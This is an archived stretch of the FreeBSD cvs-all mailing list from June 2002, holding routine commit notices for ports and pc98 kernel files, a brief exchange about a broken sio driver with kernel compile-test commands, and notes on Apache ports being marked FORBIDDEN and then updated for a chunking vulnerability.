=?iso-2022-jp?B?KBskQjgtTFobKEIp?= Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In article <200206182130.g5ILUbI13355@freefall.freebsd.org> Nick Hibma writes: > n_hibma 2002/06/18 14:30:37 PDT > > Modified files: > sys/pc98/pc98 sio.c > sys/conf options options.i386 options.ia64 > options.pc98 > sys/dev/sio sio.c sioreg.h This broke the sio driver for pc98. Please test your changes before commit. --- TAKAHASHI Yoshihiro THE CENTER for INFORMATION SCIENCE, Kogakuin Univ. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:25:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 29C1D37B40B; Wed, 19 Jun 2002 06:25:41 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JDPf798272; Wed, 19 Jun 2002 06:25:41 -0700 (PDT) (envelope-from pat) Message-Id: <200206191325.g5JDPf798272@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 06:25:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/games/quakeforge Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 06:25:41 PDT Modified files: games/quakeforge Makefile Log: Reset maintainership. PR: 39519 Submitted by: Daniel O'Connor (previous maintainer) Revision Changes Path 1.25 +1 -1 ports/games/quakeforge/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:29:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4D8D237B40A; Wed, 19 Jun 2002 06:29:14 -0700 (PDT) Received: (from nyan@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JDTEd98674; Wed, 19 Jun 2002 06:29:14 -0700 (PDT) (envelope-from nyan) Message-Id: <200206191329.g5JDTEd98674@freefall.freebsd.org> From: Takahashi Yoshihiro Date: Wed, 19 Jun 2002 06:29:14 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/pc98/i386 userconfig.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nyan 2002/06/19 06:29:14 PDT Modified files: (Branch: RELENG_4) sys/pc98/i386 userconfig.c Log: MFi386: revision 1.175.2.9 Revision Changes Path 1.106.2.11 +0 -7 src/sys/pc98/i386/userconfig.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:35: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0261D37B404; Wed, 19 Jun 2002 06:35:02 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JDZ1E99491; Wed, 19 Jun 2002 06:35:01 -0700 (PDT) (envelope-from pat) Message-Id: <200206191335.g5JDZ1E99491@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 06:35:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/p5-WWW-Babelfish Makefile distinfo pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 06:35:01 PDT Modified files: www/p5-WWW-Babelfish Makefile distinfo pkg-descr Log: - Update to 0.10 - Give maintainership to submitter - Add WWW tag to pkg-descr PR: 39522 Submitted by: Erwin Lansing Revision Changes Path 1.5 +2 -2 ports/www/p5-WWW-Babelfish/Makefile 1.2 +1 -1 ports/www/p5-WWW-Babelfish/distinfo 1.2 +1 -0 ports/www/p5-WWW-Babelfish/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:38: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CAAB637B407; Wed, 19 Jun 2002 06:38:05 -0700 (PDT) Received: (from nyan@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JDc5799789; Wed, 19 Jun 2002 06:38:05 -0700 (PDT) (envelope-from nyan) Message-Id: <200206191338.g5JDc5799789@freefall.freebsd.org> From: Takahashi Yoshihiro Date: Wed, 19 Jun 2002 06:38:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/conf files.pc98 X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nyan 2002/06/19 06:38:05 PDT Modified files: (Branch: RELENG_4) sys/conf files.pc98 Log: Remove i386/isa/if_ar.c entry. Revision Changes Path 1.140.2.38 +0 -1 src/sys/conf/files.pc98 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:39:32 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4368437B40B; Wed, 19 Jun 2002 06:39:28 -0700 (PDT) Received: (from nyan@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JDdSq99868; Wed, 19 Jun 2002 06:39:28 -0700 (PDT) (envelope-from nyan) Message-Id: <200206191339.g5JDdSq99868@freefall.freebsd.org> From: Takahashi Yoshihiro Date: Wed, 19 Jun 2002 06:39:28 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/pc98/pc98 isa_compat.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nyan 2002/06/19 06:39:28 PDT Modified files: (Branch: RELENG_4) sys/pc98/pc98 isa_compat.h Log: MFi386: revision 1.27.2.10 Revision Changes Path 1.13.2.12 +1 -11 src/sys/pc98/pc98/isa_compat.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:40:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E26D037B40F; Wed, 19 Jun 2002 06:40:07 -0700 (PDT) Received: (from nyan@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JDe7799942; Wed, 19 Jun 2002 06:40:07 -0700 (PDT) (envelope-from nyan) Message-Id: <200206191340.g5JDe7799942@freefall.freebsd.org> From: Takahashi Yoshihiro Date: Wed, 19 Jun 2002 06:40:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/pc98/conf GENERIC X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nyan 2002/06/19 06:40:07 PDT Modified files: (Branch: RELENG_4) sys/pc98/conf GENERIC Log: MFi386: revision 1.246.2.43 Revision Changes Path 1.142.2.29 +2 -2 src/sys/pc98/conf/GENERIC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:45:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 500E437B40B; Wed, 19 Jun 2002 06:45:19 -0700 (PDT) Received: (from nyan@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JDjJo00861; Wed, 19 Jun 2002 06:45:19 -0700 (PDT) (envelope-from nyan) Message-Id: <200206191345.g5JDjJo00861@freefall.freebsd.org> From: Takahashi Yoshihiro Date: Wed, 19 Jun 2002 06:45:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/boot/pc98/kgzldr crt.s X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nyan 2002/06/19 06:45:19 PDT Modified files: (Branch: RELENG_4) sys/boot/pc98/kgzldr crt.s Log: MFC: Fixed to conflict labels. Revision Changes Path 1.1.2.2 +3 -3 src/sys/boot/pc98/kgzldr/crt.s To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:48:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EF9F837B40E; Wed, 19 Jun 2002 06:47:53 -0700 (PDT) Received: (from nyan@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JDlrw01072; Wed, 19 Jun 2002 06:47:53 -0700 (PDT) (envelope-from nyan) Message-Id: <200206191347.g5JDlrw01072@freefall.freebsd.org> From: Takahashi Yoshihiro Date: Wed, 19 Jun 2002 06:47:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/pc98/conf GENERIC X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nyan 2002/06/19 06:47:53 PDT Modified files: sys/pc98/conf GENERIC Log: MFi386: revisions from 1.342 to 1.344 Revision Changes Path 1.204 +2 -0 src/sys/pc98/conf/GENERIC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 6:59:57 2002 Delivered-To: cvs-all@freebsd.org Received: from mile.nevermind.kiev.ua (office.netstyle.com.ua [213.186.199.26]) by hub.freebsd.org (Postfix) with ESMTP id F1D4637B406; Wed, 19 Jun 2002 06:59:50 -0700 (PDT) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.3/8.12.3) with ESMTP id g5JDxkeG017195; Wed, 19 Jun 2002 16:59:47 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.3/8.12.3/Submit) id g5JDxkq9017194; Wed, 19 Jun 2002 16:59:46 +0300 (EEST) Date: Wed, 19 Jun 2002 16:59:46 +0300 From: Alexandr Kovalenko To: Jacques Vidrine Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG Subject: Re: cvs commit: ports/russian/apache13 Makefile ports/russian/apache13-modssl Makefile ports/www/apache13 Makefile ports/www/apache13+ipv6 Makefile ports/www/apache13-fp Makefile ports/www/apache2 Makefile ports/www/apache13-modssl Makefile ports/www/apache13-ssl Makefile Message-ID: <20020619135946.GD805@nevermind.kiev.ua> References: <200206181233.g5ICXFE13886@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: <200206181233.g5ICXFE13886@freefall.freebsd.org> User-Agent: Mutt/1.3.99i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, Jacques Vidrine! On Tue, Jun 18, 2002 at 05:33:14AM -0700, you wrote: > nectar 2002/06/18 05:33:14 PDT > > Modified files: > russian/apache13 Makefile > russian/apache13-modssl Makefile This ones are not vulnerable to this issue, because they don't use vulnerable code. > www/apache13 Makefile > www/apache13+ipv6 Makefile > www/apache13-fp Makefile > www/apache2 Makefile > www/apache13-modssl Makefile > www/apache13-ssl Makefile > Log: > Mark FORBIDDEN until an update is available. > See . > > Revision Changes Path > 1.20 +3 -0 ports/russian/apache13-modssl/Makefile > 1.22 +3 -0 ports/russian/apache13/Makefile > 1.28 +3 -0 ports/www/apache13+ipv6/Makefile > 1.32 +3 -0 ports/www/apache13-fp/Makefile > 1.101 +3 -0 ports/www/apache13-modssl/Makefile > 1.77 +3 -0 ports/www/apache13-ssl/Makefile > 1.118 +3 -0 ports/www/apache13/Makefile > 1.117 +3 -0 ports/www/apache2/Makefile -- NEVE-RIPE Ukrainian FreeBSD User Group http://uafug.org.ua/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 7:30:13 2002 Delivered-To: cvs-all@freebsd.org Received: from zibbi.icomtek.csir.co.za (zibbi.icomtek.csir.co.za [146.64.24.58]) by hub.freebsd.org (Postfix) with ESMTP id 9DF3337B407; Wed, 19 Jun 2002 07:29:57 -0700 (PDT) Received: (from jhay@localhost) by zibbi.icomtek.csir.co.za (8.11.6/8.11.6) id g5JETlG92446; Wed, 19 Jun 2002 16:29:47 +0200 (SAT) (envelope-from jhay) From: John Hay Message-Id: <200206191429.g5JETlG92446@zibbi.icomtek.csir.co.za> Subject: Re: cvs commit: src/sys/conf files.pc98 In-Reply-To: <200206191338.g5JDc5799789@freefall.freebsd.org> from Takahashi Yoshihiro at "Jun 19, 2002 06:38:05 am" To: nyan@FreeBSD.org (Takahashi Yoshihiro) Date: Wed, 19 Jun 2002 16:29:47 +0200 (SAT) Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > nyan 2002/06/19 06:38:05 PDT > > Modified files: (Branch: RELENG_4) > sys/conf files.pc98 > Log: > Remove i386/isa/if_ar.c entry. Oops, I forgot about the pc98 stuff.... sorry. John -- John Hay -- John.Hay@icomtek.csir.co.za / jhay@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 7:32:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DF38D37B40A; Wed, 19 Jun 2002 07:32:32 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JEWW109943; Wed, 19 Jun 2002 07:32:32 -0700 (PDT) (envelope-from pat) Message-Id: <200206191432.g5JEWW109943@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 07:32:32 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/smtpproxy Makefile pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 07:32:32 PDT Modified files: mail/smtpproxy Makefile pkg-descr Log: - Use REINPLACE_CMD - Reset maintainer back to ports@ PR: 39493 Submitted by: Kimura Fuyuki (previous maintainer) Revision Changes Path 1.2 +2 -2 ports/mail/smtpproxy/Makefile 1.2 +0 -3 ports/mail/smtpproxy/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 7:42:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3A02037B40C; Wed, 19 Jun 2002 07:42:20 -0700 (PDT) Received: (from mike@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JEgKM11116; Wed, 19 Jun 2002 07:42:20 -0700 (PDT) (envelope-from mike) Message-Id: <200206191442.g5JEgKM11116@freefall.freebsd.org> From: Mike Barcroft Date: Wed, 19 Jun 2002 07:42:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/projects/c99 index.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mike 2002/06/19 07:42:19 PDT Modified files: en/projects/c99 index.sgml Log: Remove Chuck Rouillard as an owner of pathchk(1), even though the manual he wrote was committed. Requested by: Chuck Rouillard Revision Changes Path 1.37 +2 -2 www/en/projects/c99/index.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 7:57:42 2002 Delivered-To: cvs-all@freebsd.org Received: from rover.village.org (rover.bsdimp.com [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 1EE3637B407; Wed, 19 Jun 2002 07:57:37 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.3/8.11.3) with ESMTP id g5JEvaY45090; Wed, 19 Jun 2002 08:57:36 -0600 (MDT) (envelope-from imp@village.org) Received: from localhost (warner@rover2.village.org [10.0.0.1]) by harmony.village.org (8.11.6/8.11.6) with ESMTP id g5JEvWG95810; Wed, 19 Jun 2002 08:57:33 -0600 (MDT) (envelope-from imp@village.org) Date: Wed, 19 Jun 2002 08:57:08 -0600 (MDT) Message-Id: <20020619.085708.95767323.imp@village.org> To: nyan@jp.FreeBSD.org Cc: n_hibma@FreeBSD.org, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/pc98/pc98 sio.c src/sys/conf options options.i386 options.ia64 options.pc98 src/sys/dev/sio sio.c sioreg.h From: "M. Warner Losh" In-Reply-To: <20020619.222314.74732759.nyan@jp.FreeBSD.org> References: <200206182130.g5ILUbI13355@freefall.freebsd.org> <20020619.222314.74732759.nyan@jp.FreeBSD.org> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message: <20020619.222314.74732759.nyan@jp.FreeBSD.org> Takahashi Yoshihiro writes: : This broke the sio driver for pc98. Please test your changes before : commit. FYI: on FreeBSD/i386 you can do: cd src/sys/pc98/conf config GENERIC cd ../compile/GENERIC make depend && make Just like I'm sure most people are doing to test their kernel commits. While the above isn't perfect in the face of version cross threading, it does work well enough to know if you've broken something or not (at least at the compile level). Unlike alpha/sparc/etc You don't need cross compilers to do that. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 8: 7:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B15FA37B477; Wed, 19 Jun 2002 08:06:39 -0700 (PDT) Received: (from matusita@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JF6dM17706; Wed, 19 Jun 2002 08:06:39 -0700 (PDT) (envelope-from matusita) Message-Id: <200206191506.g5JF6dM17706@freefall.freebsd.org> From: Makoto Matsushita Date: Wed, 19 Jun 2002 08:06:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG matusita 2002/06/19 08:06:39 PDT Modified files: release Makefile Log: Set PATH statically, and use 'env -i' to kick chroot(8). As a result, the second buildworld environment is fully isolated from parent's environment variables. Tested virtually on: snapshots.jp.FreeBSD.org Approved by: arch@ (silently) MFC after: 2 weeks Revision Changes Path 1.687 +3 -3 src/release/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 8:16:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 212A337B409; Wed, 19 Jun 2002 08:13:35 -0700 (PDT) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JFDYB18654; Wed, 19 Jun 2002 08:13:34 -0700 (PDT) (envelope-from nectar) Message-Id: <200206191513.g5JFDYB18654@freefall.freebsd.org> From: Jacques Vidrine Date: Wed, 19 Jun 2002 08:13:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache13-modssl Makefile distinfo ports/www/apache13-modssl/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nectar 2002/06/19 08:13:34 PDT Modified files: www/apache13-modssl Makefile distinfo www/apache13-modssl/files patch-aa Log: Update to apache 1.3.26 / mod_ssl 2.8.9. Fixes chunking vulnerability, so now no longer FORBIDDEN. Revision Changes Path 1.102 +2 -5 ports/www/apache13-modssl/Makefile 1.65 +2 -2 ports/www/apache13-modssl/distinfo 1.9 +4 -8 ports/www/apache13-modssl/files/patch-aa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 8:23: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D6CE737B408; Wed, 19 Jun 2002 08:22:51 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JFMp319884; Wed, 19 Jun 2002 08:22:51 -0700 (PDT) (envelope-from pat) Message-Id: <200206191522.g5JFMp319884@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 08:22:51 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/smtpproxy Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 08:22:51 PDT Modified files: mail/smtpproxy Makefile Log: Oops, Add USE_REINPLACE Revision Changes Path 1.3 +1 -0 ports/mail/smtpproxy/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 8:24:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CA3F437B407; Wed, 19 Jun 2002 08:24:43 -0700 (PDT) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JFOh120037; Wed, 19 Jun 2002 08:24:43 -0700 (PDT) (envelope-from nectar) Message-Id: <200206191524.g5JFOh120037@freefall.freebsd.org> From: Jacques Vidrine Date: Wed, 19 Jun 2002 08:24:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache13-modssl pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nectar 2002/06/19 08:24:43 PDT Modified files: www/apache13-modssl pkg-plist Log: Update to apache 1.3.26 / mod_ssl 2.8.9. Fixes chunking vulnerability, so now no longer FORBIDDEN. Revision Changes Path 1.29 +59 -20 ports/www/apache13-modssl/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 8:37:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DBD0137B408; Wed, 19 Jun 2002 08:37:45 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JFbjS21562; Wed, 19 Jun 2002 08:37:45 -0700 (PDT) (envelope-from pat) Message-Id: <200206191537.g5JFbjS21562@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 08:37:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/games/ptkei Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 08:37:45 PDT Modified files: games/ptkei Makefile distinfo pkg-plist Log: Update to 1.14.0 Bump PORTEPOCH PR: 39517 Submitted by: maintainer Revision Changes Path 1.5 +4 -4 ports/games/ptkei/Makefile 1.4 +1 -1 ports/games/ptkei/distinfo 1.4 +3 -1 ports/games/ptkei/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 9: 8:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0569C37B400; Wed, 19 Jun 2002 09:08:29 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JG8So34561; Wed, 19 Jun 2002 09:08:28 -0700 (PDT) (envelope-from marcus) Message-Id: <200206191608.g5JG8So34561@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 09:08:28 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/eog2 Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 09:08:28 PDT Modified files: graphics/eog2 Makefile Log: Add a missing dependency on librsvg2. Revision Changes Path 1.25 +2 -1 ports/graphics/eog2/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 9:12:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6105F37B404; Wed, 19 Jun 2002 09:12:06 -0700 (PDT) Received: (from jeh@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JGC6Z35348; Wed, 19 Jun 2002 09:12:06 -0700 (PDT) (envelope-from jeh) Message-Id: <200206191612.g5JGC6Z35348@freefall.freebsd.org> From: "James E. Housley" Date: Wed, 19 Jun 2002 09:12:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils/healthd Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jeh 2002/06/19 09:12:06 PDT Modified files: sysutils/healthd Makefile Log: Allow IPv6 to be excluded via -DWITHOUT_IPV6 Bump PORTREVISION PR: 39526 Submitted by: steve@stevenwills.com Revision Changes Path 1.28 +2 -1 ports/sysutils/healthd/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with 